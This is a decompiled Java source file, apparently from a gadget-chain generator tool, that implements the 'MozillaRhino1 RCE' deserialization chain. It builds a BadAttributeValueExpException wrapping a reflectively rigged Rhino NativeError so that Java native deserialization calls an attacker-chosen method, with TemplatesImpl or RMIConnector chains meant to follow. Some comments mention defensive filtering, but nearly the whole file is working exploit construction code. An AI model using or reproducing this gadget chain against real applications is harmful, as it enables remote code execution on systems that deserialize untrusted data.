package com.ar3h.chains.gadget.impl.javanative.other;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.Reflections;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import javax.management.BadAttributeValueExpException;
import org.apache.logging.log4j.core.jackson.JsonConstants;
import org.mozilla.javascript.Context;
import org.mozilla.javascript.IdScriptableObject;
import org.mozilla.javascript.NativeJavaMethod;
import org.mozilla.javascript.NativeJavaObject;
import org.mozilla.javascript.NativeObject;
import org.mozilla.javascript.ScriptableObject;

/**
 * Gadget implementation that builds the object graph for the "MozillaRhino1"
 * Java-native deserialization chain (decompiled source; local names are
 * decompiler-generated).
 *
 * <p>The graph is a {@link BadAttributeValueExpException} whose {@code val}
 * field holds a Rhino {@code NativeError} scriptable object. That object has
 * Java-method-backed getters on its {@code name} and {@code message}
 * properties and a prototype wrapping the object supplied by the next chain
 * element. The annotation's description string translates to "invoke
 * arbitrary method".
 *
 * <p>Defensive relevance: per the annotation metadata this applies to Java
 * native deserialization with {@code rhino:js:1.7R2} on the classpath. A
 * stream produced from this graph references
 * {@code javax.management.BadAttributeValueExpException} together with
 * {@code org.mozilla.javascript.*} classes, so an {@code ObjectInputFilter}
 * allowlist that does not admit those classes rejects it, and the same class
 * names serve as signatures when inspecting serialized data.
 *
 * <p>NOTE(review): how the getters are reached during deserialization depends
 * on JDK and Rhino internals that are not visible in this file.
 */
@GadgetAnnotation(name = "MozillaRhino1 RCE", description = "调用任意方法", dependencies = {"rhino:js:1.7R2"}, authors = {Authors.MATTHIASKAISER})
@GadgetTags(tags = {Tag.JavaNativeDeserialize}, nextTags = {Tag.TemplatesImplChain, Tag.RMIConnectorChain})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/other/MozillaRhino1.class */
public class MozillaRhino1 implements Gadget {
    /**
     * Assembles the exception-rooted object graph around {@code obj}.
     *
     * @param obj object produced by the next chain element; it becomes the
     *            wrapped Java object of the scriptable's prototype, and its
     *            class must directly declare the method named by {@code str}
     * @param str name of a zero-argument method looked up with
     *            {@code getDeclaredMethod} on {@code obj.getClass()}
     *            (inherited methods are therefore not found)
     * @return the configured {@link BadAttributeValueExpException}
     * @throws Exception any reflective failure (missing class, constructor,
     *                   method or field) is propagated unchanged; a
     *                   {@code null} {@code obj} fails at
     *                   {@code obj.getClass()}
     */
    public Object getObject(Object obj, String str) throws Exception {
        // NativeError is looked up by name and built through its no-arg
        // declared constructor, which is forced accessible first.
        Constructor<?> declaredConstructor = Class.forName("org.mozilla.javascript.NativeError").getDeclaredConstructor(new Class[0]);
        Reflections.setAccessible(declaredConstructor);
        IdScriptableObject idScriptableObject = (IdScriptableObject) declaredConstructor.newInstance(new Object[0]);
        // Standard-object scope used as the parent scope of the prototype below.
        // NOTE(review): Context.enter() is not paired with Context.exit() in
        // this method, so the Rhino context stays entered on the calling thread.
        NativeObject nativeObject = (NativeObject) Context.enter().initStandardObjects();
        Method declaredMethod = Context.class.getDeclaredMethod("enter", new Class[0]);
        // "name" is backed by Context.enter(); "message" is backed by the
        // caller-selected zero-argument method declared on obj's class.
        // The trailing `false` presumably selects getter rather than setter,
        // consistent with the "getter" field patched below (confirm against Rhino).
        idScriptableObject.setGetterOrSetter("name", 0, new NativeJavaMethod(declaredMethod, "name"), false);
        idScriptableObject.setGetterOrSetter("message", 0, new NativeJavaMethod(obj.getClass().getDeclaredMethod(str, new Class[0]), "message"), false);
        // Fetch the internal slot object for "name" through the non-public
        // ScriptableObject.getSlot(String, int, int). The meaning of the two
        // int arguments is defined by Rhino internals not shown here.
        Method declaredMethod2 = ScriptableObject.class.getDeclaredMethod("getSlot", String.class, Integer.TYPE, Integer.TYPE);
        Reflections.setAccessible(declaredMethod2);
        Object invoke = declaredMethod2.invoke(idScriptableObject, "name", 0, 1);
        // Overwrite the slot's "getter" field with a MemberBox built directly
        // from the Context.enter() Method, replacing the NativeJavaMethod
        // registered above for "name".
        Field declaredField = invoke.getClass().getDeclaredField("getter");
        Reflections.setAccessible(declaredField);
        Constructor<?> declaredConstructor2 = Class.forName("org.mozilla.javascript.MemberBox").getDeclaredConstructor(Method.class);
        Reflections.setAccessible(declaredConstructor2);
        declaredField.set(invoke, declaredConstructor2.newInstance(declaredMethod));
        // The prototype wraps obj; the static type is fixed to TemplatesImpl
        // regardless of obj's runtime class.
        idScriptableObject.setPrototype(new NativeJavaObject(nativeObject, obj, TemplatesImpl.class));
        // Root object: val is set reflectively after construction, and the
        // Throwable bookkeeping fields are emptied or nulled.
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException((Object) null);
        Reflections.setFieldValue(badAttributeValueExpException, "val", idScriptableObject);
        Reflections.setFieldValue(badAttributeValueExpException, "stackTrace", new StackTraceElement[0]);
        Reflections.setFieldValue(badAttributeValueExpException, "suppressedExceptions", null);
        // NOTE(review): JsonConstants.ELT_CAUSE is a log4j constant used here
        // only as a field name; presumably the decompiler substituted it for
        // the literal "cause" - confirm, since it adds a log4j-core dependency.
        Reflections.setFieldValue(badAttributeValueExpException, JsonConstants.ELT_CAUSE, null);
        return badAttributeValueExpException;
    }

    /**
     * Chain entry point: asks the next chain element to create its object,
     * reads the method name stored under
     * {@code ContextTag.SPECIAL_METHOD_NAME_KEY}, and delegates to
     * {@link #getObject(Object, String)}.
     *
     * @param gadgetContext context supplying the method-name setting
     * @param gadgetChain   chain whose {@code doCreate} yields the inner object
     * @return the object graph built by {@code getObject}
     * @throws Exception propagated from {@code doCreate} or {@code getObject}
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject(gadgetChain.doCreate(gadgetContext), gadgetContext.getString(ContextTag.SPECIAL_METHOD_NAME_KEY));
    }
}
